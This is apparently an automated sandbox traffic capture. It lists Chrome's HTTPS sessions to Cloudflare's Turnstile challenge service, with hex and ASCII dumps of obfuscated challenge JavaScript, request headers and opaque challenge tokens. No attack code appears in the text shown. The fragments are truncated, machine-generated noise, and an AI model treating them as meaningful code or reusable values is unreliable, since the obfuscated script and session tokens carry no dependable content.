                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 30 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 4a 28 39 34 35 29 5d 28 32 34 30 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2c 32 34 39 29 2c 32 35 36 29 26 32 35 35 2e 38 38 2c 32 30 36 29 5e 74 68 69 73 2e 67 5d 2c 6c 3d 64 5b 68 4a 28 36 37 36 29 5d 28 74 68 69 73 2e 68 5b 32 34 30 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 37 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 30 5d 5b 31 5d 5b 68 4a 28 31 32 35 30 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 34 30 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 33 36 29 5e 34 32 2c 6d 3d 5b 6e 75 6c 6c 5d 2c 6e 3d 30 3b 64 5b 68 4a 28 31 30 39 38 29 5d 28 6e 2c 6c 29 3b 6d 5b 68 4a 28 33 36 36 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 4a 28 34 37 35 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 4a 28 31 35 35 33 29 5d 28 32
                                                                                                                                                                                                                                  Data Ascii: 0)](this.h[d[hJ(945)](240,this.g)][0]++),249),256)&255.88,206)^this.g],l=d[hJ(676)](this.h[240^this.g][3],7+this.h[this.g^240][1][hJ(1250)](this.h[this.g^240][0]++)&255.36)^42,m=[null],n=0;d[hJ(1098)](n,l);m[hJ(366)](this.h[d[hJ(475)](this.h[d[hJ(1553)](2
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 32 29 5d 3d 66 69 2c 66 54 5b 67 4a 28 31 34 34 38 29 5d 3d 66 65 2c 66 54 5b 67 4a 28 31 34 39 32 29 5d 3d 66 64 2c 65 4d 5b 67 4a 28 32 30 36 29 5d 3d 66 54 2c 65 4d 5b 67 4a 28 31 31 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 66 57 28 63 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 66 55 28 66 56 28 63 29 29 7d 7d 2c 66 58 3d 7b 7d 2c 66 58 5b 67 4a 28 35 35 33 29 5d 3d 27 6f 27 2c 66 58 5b 67 4a 28 35 37 34 29 5d 3d 27 73 27 2c 66 58 5b 67 4a 28 38 39 34 29 5d 3d 27 75 27 2c 66 58 5b 67 4a 28 33 34 33 29 5d 3d 27 7a 27 2c 66 58 5b 67 4a 28 35 37 39 29 5d 3d 27 6e 27 2c 66 58 5b 67 4a 28 31 34 32 36 29 5d 3d 27 49 27 2c 66 58 5b 67 4a 28 31 33 39 34 29 5d 3d 27 62 27 2c 66 59 3d 66 58 2c 65 4d 5b 67 4a
                                                                                                                                                                                                                                  Data Ascii: 2)]=fi,fT[gJ(1448)]=fe,fT[gJ(1492)]=fd,eM[gJ(206)]=fT,eM[gJ(1109)]=function(c){try{return fW(c)}catch(e){return fU(fV(c))}},fX={},fX[gJ(553)]='o',fX[gJ(574)]='s',fX[gJ(894)]='u',fX[gJ(343)]='z',fX[gJ(579)]='n',fX[gJ(1426)]='I',fX[gJ(1394)]='b',fY=fX,eM[gJ
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 31 29 5d 5b 67 4a 28 39 35 36 29 5d 28 67 32 29 2c 65 4d 5b 67 4a 28 31 30 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 44 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 44 3d 67 4a 2c 69 3d 7b 27 4d 50 57 65 61 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 21 3d 3d 6f 7d 2c 27 50 72 4d 53 56 27 3a 69 44 28 34 35 36 29 2c 27 48 68 69 6a 75 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 67 66 59 6a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 53 77 7a 61 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 69 44 28 31 34 38 37 29 5d 28 68 29 2c 6b 3d 30 3b 6b
                                                                                                                                                                                                                                  Data Ascii: 1)][gJ(956)](g2),eM[gJ(1074)]=function(g,h,iD,i,j,k,l,m){for(iD=gJ,i={'MPWea':function(n,o){return n!==o},'PrMSV':iD(456),'Hhiju':function(n,o){return n<o},'gfYjc':function(n,o){return o===n},'Swzap':function(n,o){return n(o)}},j=Object[iD(1487)](h),k=0;k
                                                                                                                                                                                                                                  2024-12-18 19:28:50 UTC1369INData Raw: 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 74 53 4e 4d 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 61 71 52 6f 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4f 48 6e 6c 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 6c 52 62 4d 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 62 58 59 58 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4a 6a 44 65 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 53 65 59 6c 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                                                                                                                                                                                                                  Data Ascii: on(h,i){return h(i)},'tSNME':function(h,i){return h|i},'aqRou':function(h,i){return h(i)},'OHnlt':function(h,i){return h==i},'lRbMC':function(h,i){return i!=h},'bXYXs':function(h,i){return h&i},'JjDeA':function(h,i){return h*i},'SeYle':function(h,i){retur


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  33192.168.2.1649773104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:52 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418ee08bfa41f8&lang=auto HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:52 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 115235
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418efafc9542d2-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76
                                                                                                                                                                                                                                  Data Ascii: ning%20a%20Cloudflare%20security%20challenge","turnstile_footer_terms":"Terms","turnstile_overrun_description":"Stuck%20here%3F","testing_only":"Testing%20only.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20v
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 2c 66 58 2c 66 59 2c 66 5a 2c 67 33 2c 67 34 2c 67 62 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 32 38 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 38 34 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 33 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 34 30 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 35 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 35 34 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 37 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e
                                                                                                                                                                                                                                  Data Ascii: ,fX,fY,fZ,g3,g4,gb,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1428))/1*(parseInt(gI(1284))/2)+-parseInt(gI(1573))/3+-parseInt(gI(440))/4+-parseInt(gI(1135))/5*(-parseInt(gI(1054))/6)+parseInt(gI(597))/7*(-parseIn
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 28 38 38 31 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 4d 28 38 36 34 29 5d 5b 67 4d 28 36 32 39 29 5d 29 2b 27 2f 27 3a 27 27 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 6d 3d 68 7c 7c 67 4d 28 35 31 36 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 78 5b 67 4d 28 36 39 39 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 6e 3d 66 58 5b 67 4d 28 36 33 30 29 5d 28 43 29 5b 67 4d 28 31 32 39 33 29 5d 28 27 2b 27 2c 69 5b 67 4d 28 31 35 36 39 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 66 5b 67 4d 28 31 32 32 38 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 66 5b 67 4d 28 31 32 32 38 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 33 32 32 29 5d 28 66 5b 67 4d 28 31 32 32 38 29 5d 2c 4f 62 6a 65 63 74 5b 67
                                                                                                                                                                                                                                  Data Ascii: (881)]('h/',eM[gM(864)][gM(629)])+'/':'';continue;case'2':m=h||gM(516);continue;case'3':x[gM(699)]=5e3;continue;case'4':n=fX[gM(630)](C)[gM(1293)]('+',i[gM(1569)]);continue;case'5':f[gM(1228)]instanceof Error?f[gM(1228)]=JSON[gM(322)](f[gM(1228)],Object[g
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 47 58 6d 45 45 27 3a 67 4e 28 31 34 37 37 29 2c 27 67 77 59 6c 47 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 27 4b 43 78 63 69 27 3a 67 4e 28 31 32 38 32 29 7d 2c 65 5b 67 4e 28 31 34 30 36 29 5d 28 64 2c 45 72 72 6f 72 29 29 3f 28 66 3d 64 5b 67 4e 28 39 38 33 29 5d 2c 64 5b 67 4e 28 31 36 33 35 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 67 4e 28 31 36 33 35 29 5d 3d 3d 3d 67 4e 28 34 33 33 29 29 26 26 28 65 5b 67 4e 28 31 35 31 39 29 5d 3d 3d 3d 67 4e 28 31 34 37 37 29 3f 28 6a 3d 64 5b 67 4e 28 31 36 33 35 29 5d 5b 67 4e 28 33 33 39 29 5d 28 27 5c 6e 27 29 2c 65 5b 67 4e 28 36 34 30 29 5d 28 6a 5b 67 4e 28 37 34 38 29 5d 2c 31 29 29 26 26 28
                                                                                                                                                                                                                                  Data Ascii: {return n instanceof o},'GXmEE':gN(1477),'gwYlG':function(n,o){return n>o},'KCxci':gN(1282)},e[gN(1406)](d,Error))?(f=d[gN(983)],d[gN(1635)]&&typeof d[gN(1635)]===gN(433))&&(e[gN(1519)]===gN(1477)?(j=d[gN(1635)][gN(339)]('\n'),e[gN(640)](j[gN(748)],1))&&(
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 3d 7b 7d 2c 65 54 5b 67 4a 28 31 36 38 35 29 5d 3d 65 53 2c 65 4d 5b 67 4a 28 38 33 30 29 5d 3d 65 54 2c 65 56 3d 65 4d 5b 67 4a 28 38 36 34 29 5d 5b 67 4a 28 31 35 37 38 29 5d 5b 67 4a 28 31 36 33 39 29 5d 2c 65 57 3d 65 4d 5b 67 4a 28 38 36 34 29 5d 5b 67 4a 28 31 35 37 38 29 5d 5b 67 4a 28 35 37 36 29 5d 2c 65 58 3d 65 4d 5b 67 4a 28 38 36 34 29 5d 5b 67 4a 28 31 35 37 38 29 5d 5b 67 4a 28 31 31 31 38 29 5d 2c 66 39 3d 21 5b 5d 2c 66 6c 3d 75 6e 64 65 66 69 6e 65 64 2c 65 4d 5b 67 4a 28 37 37 39 29 5d 28 67 4a 28 39 38 33 29 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 68 46 2c 64 2c 65 29 7b 68 46 3d 67 4a 2c 64 3d 7b 27 6a 50 63 78 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 4c 6c 58 4d 67 27 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ={},eT[gJ(1685)]=eS,eM[gJ(830)]=eT,eV=eM[gJ(864)][gJ(1578)][gJ(1639)],eW=eM[gJ(864)][gJ(1578)][gJ(576)],eX=eM[gJ(864)][gJ(1578)][gJ(1118)],f9=![],fl=undefined,eM[gJ(779)](gJ(983),function(c,hF,d,e){hF=gJ,d={'jPcxL':function(f){return f()},'LlXMg':function
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 28 33 35 34 29 5d 3d 66 6d 2c 66 53 5b 67 4a 28 31 30 35 31 29 5d 3d 66 6f 2c 66 53 5b 67 4a 28 31 32 31 30 29 5d 3d 66 6e 2c 66 53 5b 67 4a 28 38 33 34 29 5d 3d 66 79 2c 66 53 5b 67 4a 28 31 31 34 31 29 5d 3d 66 78 2c 66 53 5b 67 4a 28 38 31 38 29 5d 3d 66 77 2c 66 53 5b 67 4a 28 38 32 35 29 5d 3d 66 76 2c 66 53 5b 67 4a 28 31 30 33 31 29 5d 3d 66 67 2c 66 53 5b 67 4a 28 38 31 37 29 5d 3d 66 52 2c 66 53 5b 67 4a 28 38 30 37 29 5d 3d 66 6b 2c 66 53 5b 67 4a 28 31 30 32 30 29 5d 3d 66 68 2c 66 53 5b 67 4a 28 39 37 30 29 5d 3d 66 64 2c 66 53 5b 67 4a 28 36 36 31 29 5d 3d 66 63 2c 65 4d 5b 67 4a 28 32 39 38 29 5d 3d 66 53 2c 66 54 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 69 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 69 65 3d 67 4a 2c 66 3d 7b 27 47
                                                                                                                                                                                                                                  Data Ascii: (354)]=fm,fS[gJ(1051)]=fo,fS[gJ(1210)]=fn,fS[gJ(834)]=fy,fS[gJ(1141)]=fx,fS[gJ(818)]=fw,fS[gJ(825)]=fv,fS[gJ(1031)]=fg,fS[gJ(817)]=fR,fS[gJ(807)]=fk,fS[gJ(1020)]=fh,fS[gJ(970)]=fd,fS[gJ(661)]=fc,eM[gJ(298)]=fS,fT=function(c,ie,f,g,h,i,j,k){for(ie=gJ,f={'G
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 2c 27 44 49 42 7a 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 72 70 54 44 59 27 3a 69 75 28 31 32 32 31 29 2c 27 61 6b 4f 57 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 78 47 59 61 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 59 68 4b 54 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 64 6e 42 72 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 56 76 59 46 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 55 65 64 59 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                  Data Ascii: ,'DIBzG':function(h,i){return h<<i},'rpTDY':iu(1221),'akOWg':function(h,i){return h<<i},'xGYav':function(h,i){return h-i},'YhKTt':function(h,i){return h==i},'dnBrj':function(h,i){return h|i},'VvYFc':function(h,i){return i==h},'UedYY':function(h,i){return
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 4c 2b 2b 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 77 28 31 31 32 30 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 69 77 28 31 35 36 32 29 5d 28 38 2c 43 29 3b 4b 3d 4b 3c 3c 31 2e 35 36 7c 50 26 31 2e 32 36 2c 64 5b 69 77 28 36 38 33 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 69 77 28 37 37 31 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 50 3d 31 2c 43 3d 30 3b 64 5b 69 77 28 39 35 37 29 5d 28 43 2c 49 29 3b 4b 3d 50 7c 4b 3c 3c 31 2e 34 33 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 69 77 28 37 37 31 29 5d 28 64 5b 69 77 28 31 32 39 32 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 77 28 31 31 32 30 29 5d 28 30 29 2c 43
                                                                                                                                                                                                                                  Data Ascii: L++,C++);for(P=F[iw(1120)](0),C=0;d[iw(1562)](8,C);K=K<<1.56|P&1.26,d[iw(683)](L,o-1)?(L=0,J[iw(771)](s(K)),K=0):L++,P>>=1,C++);}else{for(P=1,C=0;d[iw(957)](C,I);K=P|K<<1.43,L==o-1?(L=0,J[iw(771)](d[iw(1292)](s,K)),K=0):L++,P=0,C++);for(P=F[iw(1120)](0),C
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC1369INData Raw: 26 26 28 53 3d 7b 7d 2c 53 5b 69 77 28 31 35 32 31 29 5d 3d 69 77 28 31 34 39 37 29 2c 53 5b 69 77 28 31 31 34 32 29 5d 3d 73 5b 69 77 28 38 36 34 29 5d 5b 69 77 28 36 34 38 29 5d 2c 53 5b 69 77 28 31 36 34 35 29 5d 3d 42 5b 69 77 28 36 39 36 29 5d 2c 53 5b 69 77 28 36 35 37 29 5d 3d 65 2c 6f 5b 69 77 28 38 34 35 29 5d 5b 69 77 28 39 39 39 29 5d 28 53 2c 27 2a 27 29 29 3b 47 2d 2d 2c 64 5b 69 77 28 33 37 30 29 5d 28 30 2c 47 29 26 26 28 47 3d 4d 61 74 68 5b 69 77 28 31 34 36 34 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 69 77 28 35 36 35 29 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 77 28 31 33 34 38 29 5d 28 4b 3c 3c 31 2c 50 26 31 2e 36 39
                                                                                                                                                                                                                                  Data Ascii: &&(S={},S[iw(1521)]=iw(1497),S[iw(1142)]=s[iw(864)][iw(648)],S[iw(1645)]=B[iw(696)],S[iw(657)]=e,o[iw(845)][iw(999)](S,'*'));G--,d[iw(370)](0,G)&&(G=Math[iw(1464)](2,I),I++),delete E[F]}else return iw(565)}else for(P=D[F],C=0;C<I;K=d[iw(1348)](K<<1,P&1.69


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  34192.168.2.1649774104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:52 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 3204
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  CF-Challenge: ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRno
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/j2coa/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:52 UTC3204OUTData Raw: 76 5f 38 66 34 31 38 65 65 30 38 62 66 61 34 31 66 38 3d 54 64 73 5a 31 5a 68 5a 6e 5a 41 5a 4c 5a 7a 66 49 4a 66 49 6d 32 35 6d 35 46 59 79 35 59 49 35 32 75 46 39 35 6e 75 49 4f 66 49 75 39 47 49 25 32 62 44 5a 39 42 37 6d 44 42 31 63 64 35 53 49 33 32 68 39 49 36 68 5a 49 62 48 49 59 70 51 49 79 57 32 49 46 73 63 5a 4f 44 49 51 5a 68 31 57 49 4c 66 42 68 49 2b 49 59 50 67 49 2b 51 6b 6f 36 49 59 57 62 70 76 50 63 5a 6f 39 57 75 6b 54 48 6e 73 7a 30 5a 4f 32 61 6b 50 53 39 32 2b 72 42 49 4f 73 49 6c 5a 49 41 35 4f 6a 65 48 33 42 63 49 4f 6d 56 50 76 32 68 79 5a 5a 43 78 62 78 68 4b 5a 57 44 44 54 42 49 24 5a 41 65 63 62 32 49 39 5a 49 51 49 35 53 68 49 70 47 73 30 57 44 49 63 55 44 35 49 37 6a 6d 68 49 49 65 50 31 6f 63 33 46 75 49 45 76 64 43 56 42 59
                                                                                                                                                                                                                                  Data Ascii: v_8f418ee08bfa41f8=TdsZ1ZhZnZAZLZzfIJfIm25m5FYy5YI52uF95nuIOfIu9GI%2bDZ9B7mDB1cd5SI32h9I6hZIbHIYpQIyW2IFscZODIQZh1WILfBhI+IYPgI+Qko6IYWbpvPcZo9WukTHnsz0ZO2akPS92+rBIOsIlZIA5OjeH3BcIOmVPv2hyZZCxbxhKZWDDTBI$ZAecb2I9ZIQI5ShIpGs0WDIcUD5I7jmhIIeP1oc3FuIEvdCVBY
                                                                                                                                                                                                                                  2024-12-18 19:28:53 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:53 GMT
                                                                                                                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 149520
                                                                                                                                                                                                                                  Connection: close
